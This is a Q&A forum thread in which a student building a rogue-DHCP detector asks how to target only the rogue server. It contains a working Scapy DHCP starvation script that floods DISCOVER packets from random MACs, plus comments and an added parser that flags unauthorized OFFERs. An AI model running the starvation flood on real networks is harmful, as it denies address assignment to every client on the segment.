So for a project I'm trying to detect and mitigate rogue DHCP servers on networks. I had everything done: I created a script which would construct discovery packets (with Scapy), and if more than one response is detected, I have another script which will DoS all DHCP servers on a network with DHCP starvation, and that worked okay.

However, I met up with my project supervisor today and he told me that I should only DoS the DHCP server that is rogue, whereas my script DoSes ALL DHCP servers.

I have no idea how I would go about this. Has anyone any ideas?

from scapy.all import *
from time import sleep
from threading import Thread

# Accept replies whose IP source differs from the address we sent to
# (DHCP replies come from the server, not from 255.255.255.255).
conf.checkIPaddr = False

# Build a DHCP DISCOVER with a random source MAC so every copy looks like a new client
pkt = Ether(src=RandMAC(), dst='ff:ff:ff:ff:ff:ff')
pkt /= IP(src='0.0.0.0', dst='255.255.255.255')          # client has no address yet
pkt /= UDP(sport=68, dport=67)                             # BOOTP client -> server ports
pkt /= BOOTP(chaddr=RandString(12, '0123456789abcdef'))   # random client hardware address
pkt /= DHCP(options=[('message-type', 'discover'), 'end'])

# loop=1 resends indefinitely; the Rand* fields are re-evaluated on each send
sendp(pkt, loop=1)
Ryan
  • If you're detecting the rogue DHCP servers why can't you just DoS them? – moritzg May 09 '17 at 19:16
  • @moritzg, how would you modify the above code (which is sending packets originating from a broadcast address) to do that? Which is to say -- you'd need a different, less-destructive attack. – Charles Duffy May 09 '17 at 19:28
  • @Ryan, if you're equipped for it, I'd tend to suggest a different approach altogether -- killing the port (for a configurable time period) if you're running managed switches, for example. (Assuming good managed switches, you should be able to set up a mirror port to receive all traffic matching a pattern, and get *only* DHCP traffic directed for your monitoring, making detection easy). – Charles Duffy May 09 '17 at 19:31
  • That's the problem: the code above works by flooding discover packets by broadcasting, meaning any available DHCP servers will try to respond. I'm not quite sure how to target it to one server. I can restrict it to one subnet, but that's not very helpful for a detection tool. – Ryan May 09 '17 at 20:41
  • @CharlesDuffy I have 7 days from today, so I don't think I have the time to take up a completely different approach haha, but the detection is working pretty well, I just have no way to target a specific DHCP IP address. The above code is my method of DoSing the whole network (all DHCP servers). In all honesty I'm very new to this, so if what I'm saying doesn't make sense, forgive me XD – Ryan May 09 '17 at 20:45
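The detection half of the question, telling an unauthorized responder apart from the site's real server, is what a monitor needs before any response (such as the switch-port shutdown suggested in the comments) can be aimed at one box. The following is an added example, not Ryan's code: a pure-Python parser that classifies a raw DHCP payload by its server identifier (option 54, falling back to siaddr) against an allowlist of known servers. The allowlist address and the sample OFFERs are constructed values, and the parser reads the raw BOOTP layout rather than Scapy objects so it runs offline.

```python
import struct
from ipaddress import IPv4Address

MAGIC_COOKIE = b"\x63\x82\x53\x63"
OPT_PAD, OPT_MESSAGE_TYPE, OPT_SERVER_ID, OPT_END = 0, 53, 54, 255

def parse_dhcp_options(payload: bytes) -> dict:
    """Return {option_code: value_bytes} from a raw BOOTP/DHCP UDP payload."""
    if len(payload) < 240 or payload[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP payload")
    opts, i = {}, 240          # options start right after the magic cookie
    while i < len(payload):
        code = payload[i]
        if code == OPT_END:
            break
        if code == OPT_PAD:    # single-byte padding, no length field
            i += 1
            continue
        if i + 1 >= len(payload):
            raise ValueError("truncated option header")
        length = payload[i + 1]
        value = payload[i + 2:i + 2 + length]
        if len(value) != length:   # reject malformed replies instead of guessing
            raise ValueError("truncated option value")
        opts[code] = value
        i += 2 + length
    return opts

def classify_offer(payload: bytes, allowed_servers: set) -> tuple:
    """Return (server_ip, verdict) with verdict 'authorized', 'rogue' or 'ignored'."""
    opts = parse_dhcp_options(payload)
    if opts.get(OPT_MESSAGE_TYPE) != b"\x02":   # only DHCPOFFER (type 2) identifies a server
        return ("", "ignored")
    server_id = opts.get(OPT_SERVER_ID)
    # Option 54 names the offering server; fall back to siaddr (bytes 20..23) if absent
    raw = server_id if server_id and len(server_id) == 4 else payload[20:24]
    ip = str(IPv4Address(raw))
    return (ip, "authorized" if ip in allowed_servers else "rogue")

def build_offer(server_ip: str, yiaddr: str, msg_type: int = 2) -> bytes:
    """Constructed sample OFFER for offline testing (not captured traffic)."""
    hdr = struct.pack("!BBBBIHH", 2, 1, 6, 0, 0x1234, 0, 0)              # op=BOOTREPLY, xid
    hdr += IPv4Address("0.0.0.0").packed + IPv4Address(yiaddr).packed     # ciaddr, yiaddr
    hdr += IPv4Address(server_ip).packed + IPv4Address("0.0.0.0").packed  # siaddr, giaddr
    hdr += b"\x00" * 16 + b"\x00" * 192                                   # chaddr, sname, file
    opts = bytes([OPT_MESSAGE_TYPE, 1, msg_type, OPT_SERVER_ID, 4]) + IPv4Address(server_ip).packed
    return hdr + MAGIC_COOKIE + opts + bytes([OPT_END])
```

Feed `classify_offer` the UDP payload of each reply the discover probe collects; a "rogue" verdict carries the server address and can be joined against the source MAC of the same frame to locate the port it sits on.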

0 Answers